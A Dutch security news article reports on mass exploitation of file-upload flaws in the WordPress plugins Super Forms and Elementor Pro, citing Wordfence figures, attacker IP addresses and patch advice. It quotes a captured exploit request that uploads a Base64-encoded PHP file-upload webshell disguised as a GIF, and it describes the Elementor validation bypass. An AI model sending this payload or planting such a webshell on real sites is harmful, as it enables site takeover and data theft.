Meer dan 440.000 exploitpogingen richten zich op Super Forms en Elementor Pro RCE-fouten

Bedreigingsactoren maken misbruik van twee kritieke beveiligingsfouten in de WordPress-plug-ins Super Forms en Elementor Pro, zo blijkt uit bevindingen van Wordfence.

De kwetsbaarheden in kwestie zijn:

  • CVE-2026-14894 (CVSS-score: 9,8) – Een ontbrekend beveiligingslek voor bestandstypevalidatie in Super Forms – Drag & Drop Form Builder waarmee niet-geverifieerde aanvallers bestanden van elk type kunnen uploaden, inclusief uitvoerbare PHP-bestanden, wat leidt tot uitvoering van externe code. (Opgelost in versie 6.3.314)
  • CVE-2026-32475 (CVSS-score: 9,0/9,8) – Een kwetsbaarheid in Elementor Pro waardoor niet-geverifieerde aanvallers bestanden van elk type kunnen uploaden, inclusief uitvoerbare PHP-bestanden, wat leidt tot uitvoering van code op afstand. (Opgelost in versie 4.2.2)

Net als dit soort kwetsbaarheden bij het uploaden van willekeurige bestanden kan een aanvaller deze gebruiken om een ​​PHP-webshell naar de site te schrijven en willekeurige code uit te voeren, die vervolgens kan worden misbruikt om beheerdersaccounts aan te maken, gegevens te exfiltreren of de controle over de hele WordPress-site over te nemen.

Het is vermeldenswaard dat details over CVE-2026-32475 vorige maand door Patchstack zijn bekendgemaakt. Succesvolle exploitatie vereist dat de doelsite ten minste één gepubliceerde Elementor-pagina heeft met een formulierwidget met een veld voor het uploaden van bestanden.

In een tweetal rapporten die deze week zijn gepubliceerd, zegt Wordfence dat het al meer dan 250.000 en 190.000 exploitpogingen tegen respectievelijk CVE-2026-14894 en CVE-2026-32475 heeft geblokkeerd.

Uitbuiting tegen CVE-2026-14894

Bij de aanvallen waarbij gebruik wordt gemaakt van CVE-2026-14894 blijken bedreigingsactoren een HTTP POST-verzoek uit te voeren naar “/wp-admin/admin-ajax.php” met behulp van het “super_submit_form”-eindpunt dat een bestandsveld bevat met een Base64-gecodeerde PHP-payload en een door de aanvaller bestuurde bestandsnaam, zoals hieronder:

action=super_submit_form&form_id=2&sf_nonce=04c3aa2046&data={“sf_upload_field”: {“type”: “files”, “files”: ({“datauristring”: “data:image/gif;base64,PD9waHAgaWYoaXNzZXQoJF9GSUxFU1siZmlsZSJdKSl7JHRhcmdldD1i YXNlbmFtZSgkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7aWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklM RVNbImZpbGUiXVsidG1wX25hbWUiXSwkdGFyZ2V0KSl7ZWNobyLinIUgVXBsb2FkZWQ6IDxhIGhyZWY9 JyR0YXJnZXQnPiR0YXJnZXQ8L2E+Ijt9ZWxzZXtlY2hvIuKdjCBVcGxvYWQgZmFpbGVkISI7fWV4aXQ7 fT8+PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPk11c2hyMDB3IFVwbG9hZGVyPC90aXR sZT48L2hlYWQ+PGJvZHkgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2ZvbnQ tZmFtaWx5Om1vbm9zcGFjZTtkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmNlbnRlcjthbGlnbi1 pdGVtczpjZW50ZXI7aGVpZ2h0OjEwMHZoO21hcmdpbjowOyI+PGZvcm0gbWV0aG9kPSJQT1NUIiBlbmN 0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBzdHlsZT0iYmFja2dyb3VuZDojMTExO3BhZGRpbmc6ND BweDtib3JkZXI6MnB4IHNvbGlkICMwMGZmMDA7Ym9yZGVyLXJhZGl1czoxMHB4O3RleHQtYWxpZ246Y2 VudGVyOyI+PGgyPvCfk6QgVVBMT0FEPC9oMj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgcm VxdWlyZWQgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2JvcmRlcjoxcHggc2 9saWQgIzAwZmYwMDtwYWRkaW5nOjEwcHg7Ym9yZGVyLXJhZGl1czo1cHg7Ij48YnI+PGJyPjxidXR0b2 4gdHlwZT0ic3VibWl0IiBzdHlsZT0iYmFja2dyb3VuZDojMDBmZjAwO2NvbG9yOiMwYTBhMGE7cGFkZG luZzoxMHB4IDMwcHg7Ym9yZGVyOm5vbmU7Ym9yZGVyLXJhZGl1czo1cHg7Zm9udC13ZWlnaHQ6Ym9sZD tjdXJzb3I6cG9pbnRlcjsiPuKshiBVcGxvYWQ8L2J1dHRvbj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4=”, “value”: “Mushr00w_upl.php”, “name”: “Mushr00w_upl.php”, “label”: “bijlage”})}}

Het geüploade bestand, hoewel voorafgegaan door het inhoudstype “data:image/gif;base64”, is een PHP-webshell voor het uploaden van bestanden (“Mushr00w_upl.php”), die vervolgens fungeert als kanaal om extra payloads naar de site te uploaden. Aanvallen die de Super Forms-plug-in als wapen gebruiken, zijn afkomstig van de volgende IP-adressen:

  • 103.168.147.235
  • 103.168.146.131
  • 103.154.152.178
  • 103.170.97.7
  • 182.10.130.51
  • 189.4.122.140
  • 129.227.46.143
  • 64.176.209.104
  • 103.164.182.122
  • 37.9.33.62

De kwaadaardige activiteit zou zijn begonnen op 14 juli 2026, voordat er op 18 augustus 2026 een piek van meer dan 40.000 exploitverzoeken werd bereikt.

Uitbuiting tegen CVE-2026-32475

“De aanvaller verzendt het veld Bestandsupload van het formulier als een array, waarbij het eerste element leeg is en het tweede element een PHP-payload bevat met een .php-bestandsnaam, wat de structuur is die de validatie-bypass activeert”, aldus het WordPress-beveiligingsbedrijf.

“Eenmaal geschreven, wordt het geüploade PHP-bestand in de map ‘/wp-content/uploads/elementor/forms/’ geplaatst onder een willekeurig gegenereerde bestandsnaam met de door de aanvaller aangeleverde .php-extensie, en de aanvaller kan het rechtstreeks aanvragen om willekeurige opdrachten op de server uit te voeren.’

Exploitatie-inspanningen gericht op CVE-2026-32475 begonnen op 19 augustus 2026 en zijn afkomstig van de onderstaande IP-adressen:

  • 2602:fa59:10:7a1::1
  • 185.196.220.85
  • 103.84.230.85
  • 103.90.148.202
  • 216.126.225.208
  • 167.254.240.75
  • 167.254.241.119
  • 114.10.17.253
  • 114.10.45.151
  • 2406:ef80:2:7d19::1

Eigenaren van WordPress-sites die de twee plug-ins gebruiken, wordt aangeraden om met onmiddellijke ingang patches voor de kwetsbaarheden toe te passen, hun sites te scannen op tekenen van besmetting en te controleren op onverwachte of onlangs gewijzigde .php-bestanden.

Thijs Van der Does